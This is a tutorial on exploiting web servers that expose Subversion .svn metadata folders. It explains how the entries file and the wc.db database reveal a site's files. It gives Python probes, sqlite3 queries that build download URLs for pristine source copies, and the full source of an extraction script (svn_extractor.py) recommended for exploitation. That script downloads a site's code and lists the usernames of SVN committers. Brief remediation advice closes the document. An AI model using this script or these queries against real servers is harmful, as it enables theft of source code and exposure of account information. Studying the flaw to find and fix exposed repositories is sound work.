SVN Vulnerability

SVN (Subversion) is source-code version-control software. SVN source-code leaks are mainly caused by careless administration: when SVN manages a local working copy, it automatically creates a hidden folder named .svn that contains important repository metadata. Some site administrators, rather than using the "export" function when publishing code, simply copy the whole working-copy folder onto the web server, which exposes the hidden .svn folder to the Internet. An attacker can then use the "entries" file inside it, which tracks version information, to map out the site structure step by step. (Via the .svn/entries file, an attacker can retrieve server source code, SVN account credentials, and other information.)
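A quick way to check whether a site is affected is to probe for the metadata files directly. Below is a minimal sketch (Python 3, using the requests library); the target URL is a placeholder, and a 200 response for either path suggests the repository metadata is exposed:

import requests

def check_svn_exposure(base_url):
    # Probe both the pre-1.7 entries file and the 1.7+ SQLite database.
    for path in (".svn/entries", ".svn/wc.db"):
        r = requests.get(base_url.rstrip("/") + "/" + path,
                         allow_redirects=False, verify=False, timeout=10)
        print(path, "->", r.status_code)

check_svn_exposure("http://somedomain/")  # placeholder target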

svn <= 1.6

In the layout of a .svn directory there is a text-base folder holding pristine copies of the source files. For example, to download somedomain/phpinfo.php, simply request somedomain/.svn/text-base/phpinfo.php.svn-base; a typical server will neither block that path nor try to interpret the suffix, so the file can be read directly. That only reaches files at the top level, though. How do we walk the whole tree? That is where .svn/entries comes in: this file lists every file and directory under the current directory, so the site can be enumerated recursively, as in the sketch below.
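As a concrete illustration, the following sketch (Python 3; somedomain and phpinfo.php are the placeholders from the paragraph above) pulls the file list from .svn/entries and fetches the pristine copy of a single file from text-base:

import requests

base = "http://somedomain/"  # placeholder target

# .svn/entries lists every file and directory in the current directory;
# each name appears on the line before its "file"/"dir" type marker.
entries = requests.get(base + ".svn/entries", verify=False).text.splitlines()
print(len(entries), "lines in entries")

# On SVN <= 1.6 the pristine copy of phpinfo.php sits at a fixed path:
r = requests.get(base + ".svn/text-base/phpinfo.php.svn-base", verify=False)
if r.status_code == 200:
    with open("phpinfo.php.source", "wb") as f:
        f.write(r.content)

Recursion works the same way: for every name marked "dir" in entries, request <dir>/.svn/entries and repeat.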

svn > 1.6

After 1.6 (i.e., from 1.7 onward), SVN manages the working copy with a database file located at .svn/wc.db. A pristine copy of an ordinary file is stored at somedomain/.svn/pristine/XX/CHECKSUM.svn-base, where CHECKSUM is the SHA-1 hash of the file contents and XX is its first two hex characters. Where does the CHECKSUM come from? From the wc.db just mentioned, which is a SQLite database (checksums are stored with a $sha1$ prefix, which is why the queries below start reading at character 7). The rough structure of the database is as follows:
$ sqlite3 wc.db .tables
ACTUAL_NODE  NODES          PRISTINE    WC_LOCK
EXTERNALS    NODES_BASE     REPOSITORY  WORK_QUEUE
LOCK         NODES_CURRENT  WCROOT
$ sqlite3 wc.db 'select local_relpath, checksum from NODES'
index.php|$sha1$4e6a225331f9ae872db25a8f85ae7be05cea6d51
scripts/menu.js|$sha1$fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf
style/style.js|$sha1$2cc5590e0ba024c3db77a13896da09b39ea74799
$ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;'
index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base
style/style.js|.svn/pristine/2c/2cc5590e0ba024c3db77a13896da09b39ea74799.svn-base

Step 1: download wc.db. Step 2: read the file names and their SHA-1 values from the NODES table. Step 3: construct the download URLs. A minimal sketch follows.
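Sketched out (Python 3; the base URL is a placeholder), the three steps look like this. Note the [6:] slice, which mirrors substr(checksum,7) by skipping the six-character $sha1$ prefix:

import requests
import sqlite3

base = "http://somedomain/"  # placeholder target

# Step 1: download wc.db.
with open("wc.db", "wb") as f:
    f.write(requests.get(base + ".svn/wc.db", verify=False).content)

# Step 2: read file paths and checksums from the NODES table.
conn = sqlite3.connect("wc.db")
rows = conn.execute(
    "select local_relpath, checksum from NODES where kind='file'").fetchall()

# Step 3: build the pristine-copy URL for each file:
# .svn/pristine/<first two hex chars>/<sha1>.svn-base
for relpath, checksum in rows:
    sha1 = checksum[6:]
    print(relpath, "->", base + ".svn/pristine/%s/%s.svn-base" % (sha1[:2], sha1))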

Exploitation:

Recommended tool: svnexploit
Exploit script written by a well-known foreign researcher: https://github.com/anantshri/svn-extractor/blob/master/svn_extractor.py
Its source code is attached below:

#!/bin/python

import requests
import sys
import argparse
import os
import sqlite3
import traceback
import re

# disable InsecureRequestWarning noise from unverified HTTPS requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def getext(filename):
    # return the file extension without the leading dot
    name, ext = os.path.splitext(filename)
    return ext[1:]


def readsvn(data, urli, match, proxy_dict):
    # parse a .svn/entries file (SVN <= 1.6) and recurse into subdirectories
    old_line = ""
    file_list = ""
    dir_list = ""
    user = ""
    pattern = re.compile(match, re.IGNORECASE)
    global author_list
    global excludes
    if not urli.endswith('/'):
        urli = urli + "/"
    for a in data.text.splitlines():
        # below functionality will find all usernames from svn entries file
        if (a == "has-props"):
            author_list.append(old_line)
        if (a == "file"):
            if not pattern.search(old_line):
                continue
            ignore = getext(old_line) in excludes
            if ignore: print urli + old_line, '(not extracted)'
            else: print urli + old_line
            if no_extract and not ignore:
                save_url_svn(urli, old_line, proxy_dict)
            file_list = file_list + ";" + old_line
        if (a == "dir"):
            if old_line != "":
                folder_path = os.path.join("output", urli.replace("http://", "").replace("https://", "").replace("/", os.path.sep), old_line)
                if not os.path.exists(folder_path):
                    if no_extract:
                        os.makedirs(folder_path)
                dir_list = dir_list + ";" + old_line
                print urli + old_line
                try:
                    d = requests.get(urli + old_line + "/.svn/entries", verify=False, proxies=(proxy_dict))
                    readsvn(d, urli + old_line, match, proxy_dict)
                except:
                    print "Error Reading %s%s/.svn/entries so killing" % (urli, old_line)
        old_line = a
    return file_list, dir_list, user


def readwc(data, urli, match, proxy_dict):
    # save wc.db locally (SVN >= 1.7) and pull file paths plus pristine URLs out of it
    folder = os.path.join("output", urli.replace("http://", "").replace("https://", "").replace("/", os.path.sep))
    pattern = re.compile(match, re.IGNORECASE)
    global author_list
    global excludes
    if not folder.endswith(os.path.sep):
        folder = folder + os.path.sep
    with open(folder + "wc.db", "wb") as f:
        f.write(data.content)
    conn = sqlite3.connect(folder + "wc.db")
    c = conn.cursor()
    try:
        c.execute('select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES where kind="file";')
        list_items = c.fetchall()
        # below functionality will find all usernames who have committed at least once
        c.execute('select distinct changed_author from nodes;')
        author_list = [r[0] for r in c.fetchall()]
        c.close()
        for filename, url_path in list_items:
            if not pattern.search(filename):
                continue
            ignore = getext(filename) in excludes
            if ignore: print urli + filename, '(not extracted)'
            else: print urli + filename
            if no_extract and not ignore:
                save_url_wc(urli, filename, url_path, proxy_dict)
    except Exception, e:
        print "Error reading wc.db, either database corrupt or invalid file"
        if show_debug:
            traceback.print_exc()
        return 1
    return 0


def show_list(list, statement):
    print statement
    cnt = 1
    for x in set(list):
        print str(cnt) + " : " + str(x)
        cnt = cnt + 1


def save_url_wc(url, filename, svn_path, proxy_dict):
    # download one pristine copy referenced by wc.db into the output folder
    global author_list
    if filename != "":
        if svn_path is None:
            folder_path = os.path.join("output", url.replace("http://", "").replace("https://", "").replace("/", os.path.sep), filename.replace("/", os.path.sep))
            if not os.path.exists(folder_path):
                os.makedirs(folder_path)
        else:
            folder = os.path.join("output", url.replace("http://", "").replace("https://", "").replace("/", os.path.sep), os.path.dirname(filename).replace("/", os.path.sep))
            if not os.path.exists(folder):
                os.makedirs(folder)
            if not folder.endswith(os.path.sep):
                folder = folder + os.path.sep
            try:
                r = requests.get(url + svn_path, verify=False, proxies=(proxy_dict))
                with open(folder + os.path.basename(filename), "wb") as f:
                    f.write(r.content)
            except Exception, e:
                print "Error while accessing : " + url + svn_path
                if show_debug:
                    traceback.print_exc()
    return 0


def save_url_svn(url, filename, proxy_dict):
    # download one pristine copy from .svn/text-base (SVN <= 1.6 layout)
    global author_list
    folder = os.path.join("output", url.replace("http://", "").replace("https://", "").replace("/", os.path.sep))
    if not folder.endswith(os.path.sep):
        folder = folder + os.path.sep
    try:
        r = requests.get(url + "/.svn/text-base/" + filename + ".svn-base", verify=False, proxies=(proxy_dict))
        if not os.path.isdir(folder + filename):
            with open(folder + filename, "wb") as f:
                f.write(r.content)
    except Exception, e:
        print "Problem saving the URL"
        if show_debug:
            traceback.print_exc()
    return 0


def main(argv):
    target = ''
    # placing global variables outside all scopes
    global show_debug
    global no_extract
    global excludes
    global author_list
    author_list = []
    desc = """This program is used to extract the hidden SVN files from a webhost considering
either .svn entries file (<= 1.6)
or wc.db (>= 1.7) are available online.
This program actually automates the directory navigation and text extraction process"""
    epilog = """Credit (C) Anant Shrivastava http://anantshri.info. Contributions from orf, sullo, paddlesteamer.
Greets to Amol Naik, Akash Mahajan, Prasanna K, Lava Kumar for valuable inputs"""
    parser = argparse.ArgumentParser(description=desc, epilog=epilog)
    parser.add_argument("--url", help="Provide URL", dest='target', required=True)
    parser.add_argument("--debug", help="Provide debug information", action="store_true")
    parser.add_argument("--noextract", help="Don't extract files just show content", action="store_false")
    # no_extract works in complement form: if --noextract is given, it becomes False
    parser.add_argument("--userlist", help="show the usernames used for commit", action="store_true")
    parser.add_argument("--wcdb", help="check only wcdb", action="store_true")
    parser.add_argument("--entries", help="check only .svn/entries file", action="store_true")
    parser.add_argument("--proxy", help="Provide HTTP Proxy in http(s)://host:port format", dest='proxy', required=False)
    parser.add_argument("--match", help="only download files that match regex")
    parser.add_argument("--exclude", help="exclude files with extensions separated by ','", dest='excludes', default='')
    x = parser.parse_args()
    url = x.target
    no_extract = x.noextract
    show_debug = x.debug
    match = x.match
    excludes = x.excludes.split(',')
    prox = x.proxy
    proxy_dict = ""
    if prox != None:
        print prox
        print "Proxy Defined"
        proxy_dict = {"http": prox, "https": prox}
    else:
        print "Proxy not defined"
        proxy_dict = ""
    if (match):
        print "Only downloading matches to %s" % match
        match = "(" + match + "|entries$|wc.db$)"  # need to allow entries$ and wc.db too
    else:
        match = ""
    if (x.wcdb and x.entries):
        print "Checking both wc.db and .svn/entries (default behaviour no need to specify switch)"
        x.wcdb = False
        x.entries = False
    if url is None:
        exit()
    print url
    if not url.endswith('/'):
        url = url + "/"
    print "Checking if URL is correct"
    try:
        r = requests.get(url, verify=False, proxies=(proxy_dict))
    except Exception, e:
        print "Problem connecting to URL"
        if show_debug:
            traceback.print_exc()
        exit()
    if [200, 403, 500].count(r.status_code) > 0:
        print "URL is active"
        if no_extract:
            folder_path = os.path.join("output", url.replace("http://", "").replace("https://", "").replace("/", os.path.sep))
            if not os.path.exists(folder_path):
                os.makedirs(folder_path)
        if not x.entries:
            print "Checking for presence of wc.db"
            r = requests.get(url + "/.svn/wc.db", verify=False, allow_redirects=False, proxies=(proxy_dict))
            if r.status_code == 200:
                print "WC.db found"
                rwc = readwc(r, url, match, proxy_dict)
                if rwc == 0:
                    if x.userlist:
                        show_list(author_list, "List of Usernames used to commit in svn are listed below")
                    exit()
            else:
                if show_debug:
                    print "Status code returned : " + str(r.status_code)
                    print "Full Response"
                    print r.text
                print "WC.db Lookup FAILED"
        if not x.wcdb:
            print "lets see if we can find .svn/entries"
            # disabling redirection to make sure no redirection based 200ok is captured
            r = requests.get(url + "/.svn/entries", verify=False, allow_redirects=False, proxies=(proxy_dict))
            if r.status_code == 200:
                print "SVN Entries Found if no file listed check wc.db too"
                data = readsvn(r, url, match, proxy_dict)
                if 'author_list' in globals() and x.userlist:
                    show_list(author_list, "List of Usernames used to commit in svn are listed below")
                # print author_list
                exit()
            else:
                if show_debug:
                    print "Status code returned : " + str(r.status_code)
                    print "Full Response"
                    print r.text
                print ".svn/entries Lookup FAILED"
                print url + " doesn't contain any SVN repository in it"
    else:
        print "URL returns " + str(r.status_code)
        exit()


if __name__ == "__main__":
    main(sys.argv[1:])
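
Per the argparse options above, a typical run (Python 2) would look like:

python svn_extractor.py --url http://example.com/ --userlist

with --wcdb or --entries to restrict the check to one technique, and --match/--exclude to filter which files get downloaded (example.com is a placeholder).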

Remediation:

1) Delete the entire web folder, export the code properly from the SVN server again, and redeploy.
2) Delete the .svn folders directly on the server (see the sketch below).
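For option 2, a rough sketch of removing every .svn folder under the web root (the path is hypothetical; verify before running on a production server):

import os
import shutil

webroot = "/var/www/html"  # hypothetical web root

for dirpath, dirnames, filenames in os.walk(webroot):
    if ".svn" in dirnames:
        shutil.rmtree(os.path.join(dirpath, ".svn"))
        dirnames.remove(".svn")  # don't descend into the folder we just removed
        print("removed:", os.path.join(dirpath, ".svn"))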
